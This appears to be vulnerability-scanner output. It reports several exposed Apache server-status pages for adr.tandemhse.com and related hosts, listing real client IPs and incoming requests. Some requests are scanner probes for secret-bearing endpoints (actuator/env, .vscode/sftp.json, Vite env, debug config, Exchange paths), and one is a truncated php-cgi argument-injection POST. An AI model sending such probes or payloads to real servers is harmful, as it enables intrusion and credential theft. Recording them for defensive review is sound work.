0/1/1/0/0 (open/recv/resp/push/rst) 4-31432089600/59/33157_ 18.3474016
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7550a8a59f1
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 07-Nov-2025 09:49:18 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 309 Parent Server MPM Generation: 308 Server uptime: 55 days 21 hours 28 minutes 15 seconds Server load: 0.21 0.18 0.25 Total accesses: 1770935 - Total Traffic: 55.0 GB - Total Duration: 1020293816 CPU Usage: u153.05 s174.39 cu9699.87 cs5439.18 - .32% CPU load .367 requests/sec - 11.9 kB/second - 32.6 kB/request - 576.133 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03089772no1yes010000 13089758no0yes010000 23089918no2yes19100 33089755no0yes010000 43089756no0yes010000 Sum503 149100 ____________________________W_____________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-30830897720/182/33986_ 15.7200270365220.028.141267.63 162.19.80.7http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x01\x01\xb4\x01 0-30830897720/156/33430_ 15.68052420685800.06.011149.45 2.136.78.3h2relehse.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-30830897720/169/33754_ 15.7100144467100.07.681158.65 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 0-30830897720/151/33722_ 15.72027155751180.03.041181.24 162.19.80.7http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x01\x01\xa7\x01 0-30830897720/163/34022_ 15.7200142579050.053.721179.66 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-30830897720/170/34170_ 15.7100158922610.03.991171.11 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-30830897720/196/34146_ 15.7100222623500.08.241078.10 162.19.80.7http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x02\x01\x9a\x01 0-30830897720/173/33629_ 15.7100139462730.04.111124.78 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-30830897720/199/33988_ 15.7100150951890.08.501116.70 162.19.80.7http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x03\x01\xa5\x01 0-30830897720/156/33793_ 15.71037176314650.05.071208.57 2.136.78.3h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-30830897580/31/38533_ 3.62991162387280.00.521226.58 162.158.122.134h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30830897580/28/39213_ 3.09941199633060.00.401268.75 165.225.92.105http/1.1relehse.com:443GET /admin_layout/assets/img/modules/module2.jpg HTTP/1.1 1-30830897580/23/38864_ 3.475080192766820.00.191184.89 172.68.92.206h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-30830897580/20/38570_ 3.475080186924200.00.301115.80 172.68.92.165h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30830897580/26/39415_ 3.475071165135400.01.061217.46 172.68.92.181h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-30830897580/21/40030_ 3.475070175041000.00.231198.03 172.68.92.207h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-30830897580/27/39130_ 3.475080213029960.00.261176.67 172.68.92.167h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-30830897580/24/39781_ 3.6510164785740.00.291170.20 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-30830897580/23/37967_ 3.2799478163062880.00.211067.27 172.71.82.52h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-30830897580/23/39306_ 3.08940396204310.00.161091.39 165.225.92.105http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-30830899180/269/34999_ 20.9800175328130.017.311019.46 162.19.80.7http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x01\x01\x9d\x01 2-30830899180/237/34082_ 20.9800211061100.05.95958.42 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 2-30830899180/245/34794_ 20.9800237555470.029.941055.05 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-30830899180/249/34003_ 20.9800164279750.07.07956.02 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-30830899180/229/34355_ 20.980845133625880.06.571233.50 162.19.80.7http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x01\x01\xa7\x01 2-30830899180/231/34734_ 20.95115154078830.07.621007.16 165.225.92.105http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 2-30830899180/223/34495_ 20.9800152125650.08.341039.74 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-30830899180/258/34380_ 20.93082162010620.016.391056.13 60.188.57.0http/1.1barrerasdecontencion.com:443GET / HTTP/1.1 2-30830899180/294/34735W 20.9800156351290.029.501163.85 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-30830899180/250/34710_ 20.98014184373260.05.541047.89 162.19.80.7http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x03\x01H\x01 3-30830897550/11/38063_ 4.0600228599850.00.541205.69 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-30830897550/12/36744_ 4.0610179020440.00.741079.76 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-30830897550/21/37757_ 3.882560188027050.00.491182.69 172.68.92.193h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-30830897550/13/37217_ 4.0600236838870.00.161218.63 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-30830897550/25/37165_ 3.882040160376620.00.141111.98 172.68.92.215h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-30830897550/11/37197_ 3.95204223165836890.00.271151.22 172.71.131.10h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-30830897550/28/37479_ 3.9920951186448190.02.191259.58 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-30830897550/20/37488_ 3.872560267622140.00.461188.77 172.68.92.173h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-30830897550/18/36838_ 3.9700812089680.00.461190.44 162.158.120.193h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-30830897550/25/37949_ 3.531356310086390.00.521214.32 188.114.111.19h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-30830897560/28/32134_ 4.1610296773400.00.601017.71 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-30830897560/20/32291_ 3.875080136880670.00.721119.02 162.158.23.171h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-30830897560/22/32375_ 3.8710138620000.00.341122.61 172.68.234.50h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-30830897560/26/32716_ 3.961562154750600.00.34976.36 172.68.92.194h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-30830897560/25/32182_ 4.1611157697480.00.311016.06 162.19.80.7http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7556e520442
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 04-Nov-2025 10:54:12 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 284 Parent Server MPM Generation: 283 Server uptime: 52 days 22 hours 33 minutes 9 seconds Server load: 0.55 0.32 0.29 Total accesses: 1658613 - Total Traffic: 51.3 GB - Total Duration: 825028701 CPU Usage: u143.62 s168.31 cu9119.56 cs5119.04 - .318% CPU load .363 requests/sec - 11.8 kB/second - 32.4 kB/request - 497.421 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02809190no0yes19000 12809046no0yes010000 22809219no0yes010000 32809047no0yes010000 42809048no2yes010000 Sum502 149000 ___W______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-28328091900/199/32271_ 14.0610260237520.08.251169.00 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-28328091900/268/31772_ 13.9030151402300.06.981094.65 213.192.214.80h2cinre-backend.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28328091900/239/32126_ 13.9023132062450.03.091108.18 213.192.214.80h2cinre-backend.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28328091900/190/32096W 14.0200143143530.02.831126.98 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-28328091900/253/32308_ 14.012654130730930.031.891069.52 172.70.100.9h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28328091900/201/32531_ 14.0610151879040.05.091133.89 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-28328091900/205/32386_ 14.0530207082870.05.281011.82 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-28328091900/211/31877_ 14.0530129773140.03.691052.84 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-28328091900/195/32247_ 14.0520141864100.015.601066.10 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-28328091900/205/32110_ 14.0620168149970.08.421142.70 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-28328090460/67/36736_ 5.132372152432130.01.341104.71 172.68.245.68h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28328090460/81/37342_ 4.4135666190013500.00.911186.97 172.69.90.155h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28328090460/46/36984_ 5.132425179080670.01.121122.42 172.68.15.217h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28328090460/46/36827_ 4.801040484171704070.01.261068.25 172.69.39.139h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28328090460/44/37590_ 5.402420154241610.00.491162.01 162.158.123.167h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28328090460/47/38197_ 5.1310400164037100.00.361118.63 172.71.222.57h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28328090460/56/37298_ 5.4840829202819290.01.221102.66 162.158.123.72h2tandemsl.com:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 1-28328090460/51/38004_ 4.8335538152747730.01.031079.18 172.69.201.146h2tandemsl.com:443done, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 1-28328090460/47/36171_ 5.1210401152368150.01.061001.73 172.70.43.42h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28328090460/47/37523_ 5.132371144537950.01.921022.59 172.70.39.181h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28328092190/116/31019_ 9.081821043154850690.01.92847.62 162.158.193.12h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28328092190/132/30151_ 9.121042455188566080.03.28871.61 172.69.138.95h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28328092190/107/30994_ 8.971042462219622820.01.11926.79 172.68.211.138h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28328092190/124/30130_ 9.7018923144833060.02.72866.76 213.192.214.80h2cinre-backend.tandemhse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28328092190/134/30569_ 9.7018749116693600.04.391116.36 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28328092190/205/30846_ 9.13184510128072730.03.07892.53 172.71.102.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28328092190/147/30636_ 9.3910476129868010.03.21928.33 172.70.38.126h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28328092190/165/30565_ 8.8918270142874500.03.23914.41 162.158.155.27h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28328092190/159/30867_ 9.081047241132332860.02.65977.56 172.71.8.83h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28328092190/153/30678_ 9.09184538165115100.03.20956.84 172.71.82.52h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28328090470/82/35213_ 6.5241377217832920.00.941113.75 162.158.123.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28328090470/74/34033_ 5.87974747168593850.01.541019.87 108.162.227.15h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28328090470/78/34864_ 6.219460175953280.02.991136.62 162.158.122.44h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28328090470/66/34342_ 6.169410221757990.00.941149.11 172.68.245.115h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28328090470/73/34280_ 5.7136458148834990.01.281057.17 172.71.238.16h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28328090470/81/34324_ 6.169745153782070.01.511073.65 172.70.135.24h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-28328090470/79/34650_ 6.03360126376250.01.891185.99 172.70.130.226h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28328090470/83/34686_ 6.179412252961890.00.881120.51 104.23.213.169h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28328090470/77/34064_ 6.5241386170060920.02.111067.35 162.158.123.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28328090470/86/35191_ 6.203626177073960.02.271122.60 2.136.78.3h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-28328090480/206/31121_ 12.5900283946020.08.08994.49 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-28328090480/211/31368_ 12.463438131182080.05.811073.25 172.70.142.208h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-28328090480/213/31425_ 12.5900132751410.06.801075.70 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-28328090480/208/31667_ 12.5900144937990.06.30950.30 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-28328090480/215/31161
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755a3c1f45c
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 02-Nov-2025 19:33:31 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 273 Parent Server MPM Generation: 272 Server uptime: 51 days 7 hours 12 minutes 28 seconds Server load: 0.07 0.06 0.08 Total accesses: 1610549 - Total Traffic: 49.7 GB - Total Duration: 798499819 CPU Usage: u194.52 s205.86 cu8775.55 cs4918.78 - .318% CPU load .363 requests/sec - 11.8 kB/second - 32.4 kB/request - 495.794 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02609880no0yes010000 12610065no1yes19000 22609877no1yes010000 32609878no0yes010000 42609879no0yes010000 Sum502 149000 _______________W__________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-27226098800/253/31161_ 27.493131249171880.05.571116.57 104.23.248.198h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/276/30645_ 27.153120147661810.04.191065.09 172.71.146.245h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/262/30979_ 27.6440126349410.03.541044.32 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-27226098800/249/30925_ 27.553170138513460.05.831036.03 172.68.135.172h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/262/31105_ 27.154460126055850.03.901011.33 162.158.120.158h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/262/31420_ 27.553180147451580.05.331107.38 104.22.7.111h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/250/31308_ 27.2240200847220.016.46964.75 172.70.108.147h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/266/30826_ 27.153120125932880.05.921001.99 162.158.120.243h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/268/31116_ 27.143120137940280.06.011017.51 162.158.122.8h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/270/30994_ 26.903130163981520.05.731092.44 27.46.75.9http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27226100650/619/35745_ 41.6720144763690.024.511075.00 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-27226100650/620/36289_ 41.6600178798450.010.731138.98 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-27226100650/610/35988_ 41.6700170287180.031.361099.08 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-27226100650/630/35810_ 41.6600167065950.08.841041.86 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-27226100650/634/36638_ 41.6730150810490.09.911132.38 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-27226100650/646/37298W 41.6500158107640.019.791075.42 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-27226100650/652/36359_ 41.6630185647110.09.071083.61 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 1-27226100650/633/37023_ 41.6710146543080.010.061053.86 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-27226100650/647/35260_ 41.6610148758980.012.61961.30 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-27226100650/631/36530_ 41.531179140691550.08.84999.23 141.101.98.58h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/386/29741_ 37.3770149467020.08.64816.27 104.23.251.84h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/396/28986_ 37.355292178452200.07.85839.33 172.69.17.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/395/29854_ 37.4132210325540.07.13900.83 172.69.7.188h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/368/28982_ 37.4100140015880.010.53826.46 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-27226098770/393/29377_ 37.4120109537170.010.031079.77 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-27226098770/409/29550_ 37.4060122303040.07.89857.14 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 2-27226098770/374/29418_ 37.4150119583010.06.95861.32 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-27226098770/376/29311_ 37.4110136230280.08.88868.94 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-27226098770/383/29662_ 37.4070120590300.07.56933.92 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 2-27226098770/390/29438_ 37.336528155246140.015.62907.49 162.158.163.32h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/34/34202_ 18.834530214448360.00.481091.47 162.158.162.4h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/39/33063_ 19.073150165208510.02.11991.12 172.68.134.142h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/26/33909_ 18.663120172569920.00.551115.99 162.158.122.99h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/22/33364_ 19.073171218045110.00.601127.34 104.22.7.163h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/36/33330_ 18.43312374140434200.00.391034.29 162.158.88.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/32/33342_ 19.013100150520080.01.071055.86 172.68.12.71h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/34/33636_ 19.073170122772410.00.841164.82 172.68.135.200h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/39/33693_ 18.78312376249461020.01.221100.06 162.158.88.115h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/29/33051_ 18.723100166447410.00.341037.99 172.68.234.24h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/30/34190_ 18.834530172894680.01.201099.17 172.71.152.32h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/44/30622_ 18.784534282009850.00.70976.23 172.70.108.129h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/49/30829_ 18.774580129621680.00.881046.42 172.68.234.51h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/49/30885_ 19.083150130396310.00.791061.18 172.68.135.184h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/53/31175_ 18.853150143010360.07.86939.08 172.71.124.60h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/60/30665_ <
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c75596afee2e
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 02-Nov-2025 13:35:17 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 273 Parent Server MPM Generation: 272 Server uptime: 51 days 1 hour 14 minutes 14 seconds Server load: 0.07 0.06 0.07 Total accesses: 1604406 - Total Traffic: 49.6 GB - Total Duration: 794661803 CPU Usage: u152.26 s182.64 cu8775.55 cs4918.78 - .318% CPU load .364 requests/sec - 11.8 kB/second - 32.4 kB/request - 495.3 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02609880no0yes010000 12610065no1yes010000 22609877no1yes19000 32609878no0yes010000 42609879no0yes010000 Sum502 149000 ____________________________W_____________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-27226098800/241/31149_ 20.256700249135880.05.451116.46 162.158.122.75h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/257/30626_ 20.335400147578590.03.971064.88 188.114.111.29h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/240/30957_ 19.626710126270960.03.161043.94 172.68.124.134h2lcftech.es:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-27226098800/231/30907_ 20.236650138449830.05.051035.25 162.158.120.237h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/241/31084_ 20.295352125941130.03.591011.02 172.68.135.174h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/239/31397_ 20.296700147361110.04.741106.80 172.68.135.128h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/235/31293_ 19.606704200793330.016.21964.50 172.68.124.141h2lcftech.es:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-27226098800/245/30805_ 19.595400125785690.05.451001.52 172.68.124.136h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/251/31099_ 19.51665715137851490.05.771017.28 172.70.80.181h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/259/30983_ 19.625350163928540.05.621092.32 172.68.124.141h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27226100650/415/35541_ 24.7200143852620.021.491071.98 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-27226100650/406/36075_ 24.7210177613560.07.251135.50 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-27226100650/408/35786_ 24.7200169243220.027.791095.51 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-27226100650/409/35589_ 24.7200165895150.05.851038.87 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-27226100650/429/36433_ 24.67018149712790.06.811129.28 172.64.215.151h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27226100650/421/37073_ 24.7200156697650.014.021069.64 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-27226100650/433/36140_ 24.7200184565160.05.811080.34 